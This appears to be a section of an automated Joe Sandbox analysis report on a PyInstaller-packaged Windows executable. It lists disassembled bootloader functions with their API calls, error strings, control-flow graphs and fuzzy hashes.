                                                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                                • Opcode ID: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                                                • Instruction ID: c67d91703417ee4cd06a9e8ec98aac1a7559f1855c36f9d2b8831c7355e2c4c8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fce0b41cc66c7972387442f4a259984a91ef9247f86000003104344bdc7b7ed6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23515022A18642A6E7B0FF21D8815A9B760FF48784FC0813DEA4D67796DF3CE4419760
                                                                                                                                                                                                                                                                                Function 00007FF733398840 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                • Opcode ID: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                                                • Instruction ID: 3354ab6eaeea542ae050f56bf2c885d837d36f1bd14aa4bb617024efb0bac867
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8bb1e00aee5117eaed99adb2432ba14ac7573cdfbb2fa81c580c042f8a510df
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F0AF22A1C64296F7F09F60B8483AAB390FB84725F808239DA6E166D4CF3CD009DB10
                                                                                                                                                                                                                                                                                Function 00007FF7333B1B38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                • Opcode ID: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                                                • Instruction ID: 056e2f900d54cf4d1b89281764e492a90ad0c7f2348bf91e75ab0b20a2a94064
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de90d4660cad73c020d10a8b6ecdb18ed9fa62073eb22c4578e43967cc91730a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4602AE22E1D64261FEF5BB169411279F294AF41B90FC5C63CDD6E663E2DE3CA441B320
                                                                                                                                                                                                                                                                                Function 00007FF733391000 Relevance: 61.8, APIs: 3, Strings: 32, Instructions: 527COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                                • API String ID: 2776309574-3325264605
                                                                                                                                                                                                                                                                                • Opcode ID: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                                                • Instruction ID: 1a0c4bd990c6623bda4db904a88ea6cd995b1e05d1b9f0a628b3e2bff9b32d85
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F428E61A0C682F1FAF5BB2094543F9E351AF44790FC4C03ADA9EA62D6DE3CE545E321
                                                                                                                                                                                                                                                                                Function 00007FF733391930 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 357 7ff733391930-7ff73339196b call 7ff7333939d0 360 7ff733391971-7ff7333919b1 call 7ff7333973d0 357->360 361 7ff733391c2e-7ff733391c52 call 7ff73339bb10 357->361 366 7ff7333919b7-7ff7333919c7 call 7ff73339fc2c 360->366 367 7ff733391c1b-7ff733391c1e call 7ff73339f5a4 360->367 372 7ff7333919e8-7ff733391a04 call 7ff73339f8f4 366->372 373 7ff7333919c9-7ff7333919e3 call 7ff7333a5e48 call 7ff733392020 366->373 371 7ff733391c23-7ff733391c2b 367->371 371->361 379 7ff733391a25-7ff733391a3a call 7ff7333a5e68 372->379 380 7ff733391a06-7ff733391a20 call 7ff7333a5e48 call 7ff733392020 372->380 373->367 387 7ff733391a5b-7ff733391adc call 7ff733391c60 * 2 call 7ff73339fc2c 379->387 388 7ff733391a3c-7ff733391a56 call 7ff7333a5e48 call 7ff733392020 379->388 380->367 399 7ff733391ae1-7ff733391af4 call 7ff7333a5e84 387->399 388->367 402 7ff733391b15-7ff733391b2e call 7ff73339f8f4 399->402 403 7ff733391af6-7ff733391b10 call 7ff7333a5e48 call 7ff733392020 399->403 408 7ff733391b4f-7ff733391b6b call 7ff73339f668 402->408 409 7ff733391b30-7ff733391b4a call 7ff7333a5e48 call 7ff733392020 402->409 403->367 417 7ff733391b6d-7ff733391b79 call 7ff733391e50 408->417 418 7ff733391b7e-7ff733391b8c 408->418 409->367 417->367 418->367 419 7ff733391b92-7ff733391b99 418->419 422 7ff733391ba1-7ff733391ba7 419->422 424 7ff733391bc0-7ff733391bcf 422->424 425 7ff733391ba9-7ff733391bb6 422->425 424->424 426 7ff733391bd1-7ff733391bda 424->426 425->426 427 7ff733391bef 426->427 428 7ff733391bdc-7ff733391bdf 426->428 430 7ff733391bf1-7ff733391c04 427->430 428->427 429 7ff733391be1-7ff733391be4 428->429 429->427 431 7ff733391be6-7ff733391be9 429->431 432 7ff733391c06 430->432 433 7ff733391c0d-7ff733391c19 430->433 431->427 434 7ff733391beb-7ff733391bed 431->434 432->433 433->367 433->422 434->430
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333973D0: _fread_nolock.LIBCMT ref: 00007FF73339747A
                                                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF7333919FB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392020: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF733391B4A), ref: 00007FF733392070
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                                • Opcode ID: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                                                • Instruction ID: 8797ec090de415976b6ed3ef7b715d301e1459f30e54137aa71331d3d4ebb82f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7816E31E0D686E5EBB0AB24D0417F9B3A1EF48784F80C03AD98D67795DE3CE545AB60
                                                                                                                                                                                                                                                                                Function 00007FF7333915E0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 435 7ff7333915e0-7ff7333915f1 436 7ff7333915f3-7ff7333915fc call 7ff733391030 435->436 437 7ff733391617-7ff733391631 call 7ff7333939d0 435->437 442 7ff73339160e-7ff733391616 436->442 443 7ff7333915fe-7ff733391609 call 7ff733391e50 436->443 444 7ff733391662-7ff73339167c call 7ff7333939d0 437->444 445 7ff733391633-7ff733391661 call 7ff7333a5e48 call 7ff733392020 437->445 443->442 452 7ff733391698-7ff7333916af call 7ff73339fc2c 444->452 453 7ff73339167e-7ff733391693 call 7ff733391e50 444->453 460 7ff7333916b1-7ff7333916d4 call 7ff7333a5e48 call 7ff733392020 452->460 461 7ff7333916d9-7ff7333916dd 452->461 459 7ff733391801-7ff733391804 call 7ff73339f5a4 453->459 468 7ff733391809-7ff73339181b 459->468 474 7ff7333917f9-7ff7333917fc call 7ff73339f5a4 460->474 462 7ff7333916df-7ff7333916eb call 7ff7333911f0 461->462 463 7ff7333916f7-7ff733391717 call 7ff7333a5e84 461->463 470 7ff7333916f0-7ff7333916f2 462->470 475 7ff733391741-7ff73339174c 463->475 476 7ff733391719-7ff73339173c call 7ff7333a5e48 call 7ff733392020 463->476 470->474 474->459 479 7ff7333917e2-7ff7333917ea call 7ff7333a5e70 475->479 480 7ff733391752-7ff733391757 475->480 488 7ff7333917ef-7ff7333917f4 476->488 479->488 483 7ff733391760-7ff733391782 call 7ff73339f8f4 480->483 490 7ff733391784-7ff73339179c call 7ff7333a0034 483->490 491 7ff7333917ba-7ff7333917c6 call 7ff7333a5e48 483->491 488->474 496 7ff7333917a5-7ff7333917b8 call 7ff7333a5e48 490->496 497 7ff73339179e-7ff7333917a1 490->497 498 7ff7333917cd-7ff7333917d8 call 7ff733392020 491->498 496->498 497->483 499 7ff7333917a3 497->499 502 7ff7333917dd 498->502 499->502 502->479
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                • Opcode ID: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                                                • Instruction ID: 0ee4e209adb5046230a4597d125abafd7a65a798850c2d0ea03bb50f9b0deec2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5519F21F08647B2EAB0BB1198006B9A3A0BF44794FC4C13AED5C777A6DE3CE555E320
                                                                                                                                                                                                                                                                                Function 00007FF733397CA0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(FFFFFFFF,00000000,?,00007FF733393101), ref: 00007FF733397D44
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00007FF733393101), ref: 00007FF733397D4A
                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00007FF733393101), ref: 00007FF733397D8C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397E70: GetEnvironmentVariableW.KERNEL32(00007FF733392C4F), ref: 00007FF733397EA7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733397E70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF733397EC9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333A9174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333A918D
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                • API String ID: 365913792-1339014028
                                                                                                                                                                                                                                                                                • Opcode ID: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                                                • Instruction ID: 4c365e254bfc6b152705d70014c0ff583ac867c33c4a068192b9aa5230defd7d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C441A021B09682A1FAF0FB6598552F9A251AF857C0FC0D139ED0D777E6DE3CE901A720
                                                                                                                                                                                                                                                                                Function 00007FF7333911F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 782 7ff7333911f0-7ff73339124d call 7ff73339b340 785 7ff73339124f-7ff733391276 call 7ff733391e50 782->785 786 7ff733391277-7ff73339128f call 7ff7333a5e84 782->786 791 7ff733391291-7ff7333912af call 7ff7333a5e48 call 7ff733392020 786->791 792 7ff7333912b4-7ff7333912c4 call 7ff7333a5e84 786->792 803 7ff733391419-7ff73339142e call 7ff73339b020 call 7ff7333a5e70 * 2 791->803 798 7ff7333912c6-7ff7333912e4 call 7ff7333a5e48 call 7ff733392020 792->798 799 7ff7333912e9-7ff7333912fb 792->799 798->803 802 7ff733391300-7ff733391325 call 7ff73339f8f4 799->802 811 7ff733391411 802->811 812 7ff73339132b-7ff733391335 call 7ff73339f668 802->812 819 7ff733391433-7ff73339144d 803->819 811->803 812->811 818 7ff73339133b-7ff733391347 812->818 820 7ff733391350-7ff733391378 call 7ff733399780 818->820 823 7ff7333913f6-7ff73339140c call 7ff733391e50 820->823 824 7ff73339137a-7ff73339137d 820->824 823->811 825 7ff73339137f-7ff733391389 824->825 826 7ff7333913f1 824->826 828 7ff7333913b4-7ff7333913b7 825->828 829 7ff73339138b-7ff733391399 call 7ff7333a0034 825->829 826->823 830 7ff7333913b9-7ff7333913c7 call 7ff7333bb0a0 828->830 831 7ff7333913ca-7ff7333913cf 828->831 835 7ff73339139e-7ff7333913a1 829->835 830->831 831->820 834 7ff7333913d5-7ff7333913d8 831->834 837 7ff7333913da-7ff7333913dd 834->837 838 7ff7333913ec-7ff7333913ef 834->838 839 7ff7333913af-7ff7333913b2 835->839 840 7ff7333913a3-7ff7333913ad call 7ff73339f668 835->840 837->823 841 7ff7333913df-7ff7333913e7 837->841 838->811 839->823 840->831 840->839 841->802
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                • Opcode ID: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                                                • Instruction ID: d26fb609bf7147975b8a3e309dab5618d508b908c01835a99f8f7f8341e4858d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0351B622E08642E5EAF0BB11A4403BAA2A1FF49794FC4C139ED4D677D5EE3CE545E710
                                                                                                                                                                                                                                                                                Function 00007FF7333AFF7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7333B0316,?,?,-00000018,00007FF7333ABC5B,?,?,?,00007FF7333ABB52,?,?,?,00007FF7333A6EFE), ref: 00007FF7333B00F8
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7333B0316,?,?,-00000018,00007FF7333ABC5B,?,?,?,00007FF7333ABB52,?,?,?,00007FF7333A6EFE), ref: 00007FF7333B0104
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                • Opcode ID: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                                                • Instruction ID: c32ded0085af7a528bb5d8068915a1737b956261be5281e1811fcfa2c770ae9f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17412822B1D60261FAB5EB16A8002B5B391BF44BA0F84C13DDD1DA7394DF3DE445E320
                                                                                                                                                                                                                                                                                Function 00007FF733392A70 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF733392BC5), ref: 00007FF733392AA1
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF733392BC5), ref: 00007FF733392AAB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392310: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF733392360
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733392310: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF73339241A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentErrorFileFormatLastMessageModuleNameProcess
